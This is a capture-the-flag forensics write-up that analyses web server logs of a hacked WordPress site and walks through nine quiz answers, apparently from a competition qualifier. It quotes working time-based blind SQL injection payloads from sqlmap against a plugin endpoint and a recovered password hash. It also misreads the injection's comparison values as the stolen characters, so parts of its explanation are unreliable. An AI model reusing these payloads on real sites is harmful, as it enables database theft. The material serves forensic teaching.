Writeup Aria
C2C Qualification EnglishForensics

Log

1771217846010

description

Author: daffainfo

My website has been hacked. Please help me answer the provided questions using the available logs!

Attachments

unzip log_log-dist.zip
# Archive:  log_log-dist.zip
#   inflating: dist-log.zip

unzip dist-log.zip
# Archive:  dist-log.zip
#   inflating: error.log
#   inflating: access.log

Connect to Netcat Challenge

To view the questions and attempt the answers, connect to the challenge server using netcat with the provided port.

nc challenges.1pc.tf <port>

1771223446495

Since we will answer multiple questions, we can try answering all questions at once by providing input separated with newline (\n) using the echo command and piping it to netcat as shown below:

echo -e "182.8.97.244\njawabanno2" | nc challenges.1pc.tf 24868

1771223561373

This helps automate the process of sending answers to the challenge server, especially if there are many questions that must be answered. By using echo -e and \n, we ensure that each answer is sent on a new line, matching the format expected by the challenge server.

Analysis

1. What is the Victim's IP address?

Required Format: 127.0.0.1

Solution

Use the following command to extract all IP addresses from the log files and sort them uniquely:

grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' *.log | sort -u

Output:

access.log:1.10.1.21
access.log:127.0.0.1
access.log:165.22.125.147
access.log:182.8.97.244
access.log:219.75.27.16
error.log:165.22.125.147
error.log:172.18.0.1
error.log:172.18.0.3

After that, perform brute force on the IP addresses since there are only a few possible IPs:

grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' *.log | cut -d: -f2 | sort -u

# brute force ip
grep -hEo '([0-9]{1,3}\.){3}[0-9]{1,3}' *.log | sort -u | while read IP
do
    RESULT=$(printf "%s\n" "$IP" | nc -w 1 $HOST $PORT)
    if echo "$RESULT" | grep -q "Status: Correct"; then
        echo "[+] FOUND Victim IP: $IP"
        break
    else
        echo "[-] Wrong: $IP"
    fi
done

1771225089133

182.8.97.244

2. What is the Attacker's IP address?

Required Format: 127.0.0.1

Solution

Previously, manual inspection using cat was performed. However, an alternative tool called goaccess was used for better log analysis.

Install goaccess:

sudo apt install goaccess

Use goaccess to analyze the log file and display statistics, including the most frequent IP addresses:

goaccess access.log --log-format=COMBINED
goaccess access.log --log-format=COMBINED -o report.html

1771225419527

219.75.27.16

3. How many login attempts were made by the attacker?

Required Format: 1337

Solution

We try to grep the login section in the log file.

grep -i "login" *.log  | grep -i post

# However, after checking again, we also need to filter for status code 200 because there may be some failed login attempts or just redirects.
grep -i "login" *.log  | grep -i post | grep 200
grep -i "login" *.log  | grep -i post | grep 200 | wc -l

Output: 1771225767515

6

4. Which plugin was affected (Full Name)?

Required Format: -

Solution

Since we know from the previous logs that there were several requests directed to /wp-login.php, we can grep wp-content/plugins to see which plugins were accessed by the attacker. We also use sed to clean up the timestamp and other unnecessary information, then sort and uniq to get a list of unique plugins.

cat *.log | grep "wp-content/plugins" | sed 's/\[.*\] //' | sort | uniq

1771226119078

However, when I tried answering with easy-quotes and easy quotes, the answer was incorrect. So I searched on Google and found the correct plugin name.

1771226267708

Easy Quotes

5. What is the CVE ID?

Required Format: CVE-XXXX-XXXX

Solution

We can search for the CVE ID related to the Easy Quotes plugin that we found earlier. We try searching on the website https://wpscan.com/plugins/ because it has a fairly complete database of WordPress plugin CVEs.

Finally, I found the CVE on the following page: https://wpscan.com/plugins/?page=12&get=e

1771226526549

1771226567441

CVE-2025-26943

6. Which tool and version were used to exploit the CVE?

Required Format: tool_name/13.3.7

Solution

Since we know that the CVE is CVE-2025-26943, which is related to SQL injection, we check whether there are logs associated with tools such as wpscan or sqlmap.

cat *.log | grep "wpscan" | sed 's/\[.*\] //' | sort | uniq
cat *.log | grep "sqlmap" | sed 's/\[.*\] //' | sort | uniq

1771226756861

sqlmap/1.10.1.21

7. What is the email address obtained by the attacker?

Required Format: r00t@localhost.xyz

Solution

Since we know that the attacker used sqlmap to exploit the CVE, it is very likely that they successfully retrieved an email address from the database. Therefore, we try to grep user_email.

grep "user_email" access.log

output:

219.75.27.16 - - [11/Jan/2026:13:02:18 +0000] "GET /wp-json/layart/v1/fonts?family=1%27%20AND%20%28SELECT%201146%20FROM%20%28SELECT%28SLEEP%281-%28IF%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28user_email%20AS%20NCHAR%29%2C0x20%29%20FROM%20wordpress.wp_users%20ORDER%20BY%20ID%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E64%2C0%2C1%29%29%29%29%29txje%29--%20ugUY HTTP/1.1" 200 724 "http://165.22.125.147/wp-json/layart/v1/fonts?family=1" "sqlmap/1.10.1.21#dev (https://sqlmap.org)"
219.75.27.16 - - [11/Jan/2026:13:02:19 +0000] "GET /wp-json/layart/v1/fonts?family=1%27%20AND%20%28SELECT%201146%20FROM%20%28SELECT%28SLEEP%281-%28IF%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28user_email%20AS%20NCHAR%29%2C0x20%29%20FROM%20wordpress.wp_users%20ORDER%20BY%20ID%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E96%2C0%2C1%29%29%29%29%29txje%29--%20ugUY HTTP/1.1" 200 724 "http://165.22.125.147/wp-json/layart/v1/fonts?family=1" "sqlmap/1.10.1.21#dev (https://sqlmap.org)"
219.75.27.16 - - [11/Jan/2026:13:02:20 +0000] "GET /wp-json/layart/v1/fonts?family=1%27%20AND%20%28SELECT%201146%20FROM%20%28SELECT%28SLEEP%281-%28IF%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28user_email%20AS%20NCHAR%29%2C0x20%29%20FROM%20wordpress.wp_users%20ORDER%20BY%20ID%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E112%2C0%2C1%29%29%29%29%29txje%29--%20ugUY HTTP/1.1" 200 725 "http://165.22.125.147/wp-json/layart/v1/fonts?family=1" "sqlmap/1.10.1.21#dev (https://sqlmap.org)"
219.75.27.16 - - [11/Jan/2026:13:02:20 +0000] "GET /wp-json/layart/v1/fonts?family=1%27%20AND%20%28SELECT%201146%20FROM%20%28SELECT%28SLEEP%281-%28IF%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28user_email%20AS%20NCHAR%29%2C0x20%29%20FROM%20wordpress.wp_users%20ORDER%20BY%20ID%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E104%2C0%2C1%29%29%29%29%29txje%29--%20ugUY HTTP/1.1" 200 725 "http://165.22.125.147/wp-json/layart/v1/fonts?family=1" "sqlmap/1.10.1.21#dev (https://sqlmap.org)"
219.75.27.16 - - [11/Jan/2026:13:02:20 +0000] "GET /wp-json/layart/v1/fonts?family=1%27%20AND%20%28SELECT%201146%20FROM%20%28SELECT%28SLEEP%281-%28IF%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28user_email%20AS%20NCHAR%29%2C0x20%29%20FROM%20wordpress.wp_users%20ORDER%20BY%20ID%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E100%2C0%2C1%29%29%29%29%29txje%29--%20ugUY HTTP/1.1" 200 725 "http://165.22.125.147/wp-json/layart/v1/fonts?family=1" "sqlmap/1.10.1.21#dev (https://sqlmap.org)"
219.75.27.16 - - [11/Jan/2026:13:02:20 +0000] "GET /wp-json/layart/v1/fonts?family=1%27%20AND%20%28SELECT%201146%20FROM%20%28SELECT%28SLEEP%281-%28IF%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28user_email%20AS%20NCHAR%29%2C0x20%29%20FROM%20wordpress.wp_users%20ORDER%20BY%20ID%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E98%2C0%2C1%29%29%29%29%29txje%29--%20ugUY HTTP/1.1" 200 724 "http://165.22.125.147/wp-json/layart/v1/fonts?family=1" "sqlmap/1.10.1.21#dev (https://sqlmap.org)"

# ---

1771226936960 From the access log, it can be seen that the attacker used sqlmap time-based blind SQL injection to extract the user_email value from the wordpress.wp_users table.

Example payload found in the log:

SELECT IFNULL(CAST(user_email AS NCHAR),0x20)
FROM wordpress.wp_users
ORDER BY ID LIMIT 0,1

Then sqlmap used the following technique:

ORD(MID(..., position, 1)) > value

To guess each character one by one based on its ASCII value. Example important parts from the log:

... ORD(MID((SELECT IFNULL(CAST(user_email AS NCHAR),0x20) FROM wordpress.wp_users ORDER BY ID LIMIT 0,1),1,1))>64 ...
... ORD(MID((SELECT IFNULL(CAST(user_email AS NCHAR),0x20) FROM wordpress.wp_users ORDER BY ID LIMIT 0,1),1,1))>96 ...
... ORD(MID((SELECT IFNULL(CAST(user_email AS NCHAR),0x20) FROM wordpress.wp_users ORDER BY ID LIMIT 0,1),1,1))>112 ...
... ORD(MID((SELECT IFNULL(CAST(user_email AS NCHAR),0x20) FROM wordpress.wp_users ORDER BY ID LIMIT 0,1),1,1))>104 ...
... ORD(MID((SELECT IFNULL(CAST(user_email AS NCHAR),0x20) FROM wordpress.wp_users ORDER BY ID LIMIT 0,1),1,1))>100 ...
... ORD(MID((SELECT IFNULL(CAST(user_email AS NCHAR),0x20) FROM wordpress.wp_users ORDER BY ID LIMIT 0,1),1,1))>98 ...

Those ASCII values correspond to:

64  = @
96  = `
112 = p
104 = h
100 = d
98  = b

Use the following command to extract the ASCII values and convert them into the email string:

grep "user_email" access.log | \
sed -E 's/.*%21%3D([0-9]+).*/\1/' | \
grep -E '^[0-9]+$' | \
awk '{printf "%c",$1}'

output: admin@daffainfo.com

1771227202696

admin@daffainfo.com

8. What is the password hash obtained by the attacker?

Required Format: -

Solution

We perform the same method as before, but this time we search for user_pass because password hashes are usually stored in that field in the WordPress database.

grep "user_pass" access.log | \
sed -E 's/.*%21%3D([0-9]+).*/\1/' | \
grep -E '^[0-9]+$' | \
awk '{printf "%c",$1}'

1771227314455

output: $wp$2y$10$vMTERqJh2IlhS.NZthNpRu/VWyhLWc0ZmTgbzIUcWxwNwXze44SqW

$wp$2y$10$vMTERqJh2IlhS.NZthNpRu/VWyhLWc0ZmTgbzIUcWxwNwXze44SqW

9. When did the attacker successfully log in?

Required Format: DD/MM/YYYY HH:MM:SS

Solution

We grep to search for requests targeting wp-login.php with status code 302 (redirect after a successful login) to find the timestamp of the successful login.

grep "wp-login.php" access.log | grep " 302"

output:

182.8.97.244 - - [11/Jan/2026:12:25:33 +0000] "POST /wp-login.php HTTP/1.1" 302 1275 "http://165.22.125.147/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.56 Safari/537.36"
219.75.27.16 - - [11/Jan/2026:13:12:49 +0000] "POST /wp-login.php HTTP/1.1" 302 1275 "http://165.22.125.147/wp-login.php?redirect_to=http%3A%2F%2F165.22.125.147%2Fwp-admin%2F&reauth=1" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.56 Safari/537.36"

1771227457311

11/01/2026 13:12:49

Answer Questions

answers = [
    "182.8.97.244",
    "219.75.27.16",
    "6",
    "Easy Quotes",
    "CVE-2025-26943",
    "sqlmap/1.10.1.21",
    "admin@daffainfo.com",
    "$wp$2y$10$vMTERqJh2IlhS.NZthNpRu/VWyhLWc0ZmTgbzIUcWxwNwXze44SqW",
    "11/01/2026 13:12:49"
]
for answer in answers:
    print(answer)
HOST=challenges.1pc.tf
PORT=47693

echo -e "182.8.97.244\n" | nc $HOST $PORT
echo -e "182.8.97.244\n219.75.27.16\n" | nc $HOST $PORT
echo -e "182.8.97.244\n219.75.27.16\n6\n" | nc $HOST $PORT
echo -e "182.8.97.244\n219.75.27.16\n6\nEasy Quotes\n" | nc $HOST $PORT
echo -e "182.8.97.244\n219.75.27.16\n6\nEasy Quotes\nCVE-2025-26943\n" | nc $HOST $PORT
echo -e "182.8.97.244\n219.75.27.16\n6\nEasy Quotes\nCVE-2025-26943\nsqlmap/1.10.1.21\n" | nc $HOST $PORT

# karena di password ada karakter khusus `$`, kita perlu escape dengan `\` atau gunakan single quotes untuk menghindari interpretasi shell.
# namun ketika saya coba gagal terus jadi alternatif saya gunakan printf yang lebih fleksibel untuk mengirimkan string dengan karakter khusus tanpa perlu khawatir tentang escaping.
printf "182.8.97.244\n219.75.27.16\n6\nEasy Quotes\nCVE-2025-26943\nsqlmap/1.10.1.21\nadmin@daffainfo.com\n" | nc $HOST $PORT
printf "182.8.97.244\n219.75.27.16\n6\nEasy Quotes\nCVE-2025-26943\nsqlmap/1.10.1.21\nadmin@daffainfo.com\n%s\n" '$wp$2y$10$vMTERqJh2IlhS.NZthNpRu/VWyhLWc0ZmTgbzIUcWxwNwXze44SqW' | nc $HOST $PORT
printf "182.8.97.244\n219.75.27.16\n6\nEasy Quotes\nCVE-2025-26943\nsqlmap/1.10.1.21\nadmin@daffainfo.com\n%s\n11/01/2026 13:12:49\n" '$wp$2y$10$vMTERqJh2IlhS.NZthNpRu/VWyhLWc0ZmTgbzIUcWxwNwXze44SqW' | nc $HOST $PORT

1771224099132

alternatif lain bisa menggunakan python

import socket
import sys

if len(sys.argv) != 3:
    print(f"Usage: {sys.argv[0]} HOST PORT")
    exit()

HOST = sys.argv[1]
PORT = int(sys.argv[2])

s = socket.socket()
s.connect((HOST, PORT))

def recv_until(target):
    data = ""
    while target not in data:
        chunk = s.recv(1).decode()
        if not chunk: break
        data += chunk
    print(data, end="")
    return data

def send(msg):
    s.sendall((msg + "\n").encode())

# Jawaban yang sudah pasti benar
answers = [
    "182.8.97.244",
    "219.75.27.16",
    "6",
    "Easy Quotes",
    "CVE-2025-26943",
    "sqlmap/1.10.1.21",
    "admin@daffainfo.com",
    "$wp$2y$10$vMTERqJh2IlhS.NZthNpRu/VWyhLWc0ZmTgbzIUcWxwNwXze44SqW",
    "11/01/2026 13:12:49"
]

# Jalankan otomatis untuk jawaban yang sudah ada
for ans in answers:
    recv_until("Your Answer:")
    send(ans)

# Masuk mode interaktif untuk pertanyaan baru (Q3, dst)
while True:
    # Baca sampai prompt muncul
    data = ""
    while True:
        chunk = s.recv(4096).decode()
        if not chunk: break
        data += chunk
        print(chunk, end="")
        if "Your Answer:" in data or ":" in data:
            break

    # Input manual dan kirim
    user_input = input(">> ")
    send(user_input)

python3 nc_quiz.py $HOST $PORT

1771227776331

flag

C2C{7H15_15_V3rY_345Y_3a4d4f3b57c1}

nexus

Previous Page

Tattletale

Next Page

On this page

descriptionAttachmentsConnect to Netcat ChallengeAnalysis1. What is the Victim's IP address?Solution2. What is the Attacker's IP address?Solution3. How many login attempts were made by the attacker?Solution4. Which plugin was affected (Full Name)?Solution5. What is the CVE ID?Solution6. Which tool and version were used to exploit the CVE?Solution7. What is the email address obtained by the attacker?Solution8. What is the password hash obtained by the attacker?Solution9. When did the attacker successfully log in?SolutionAnswer Questionsflag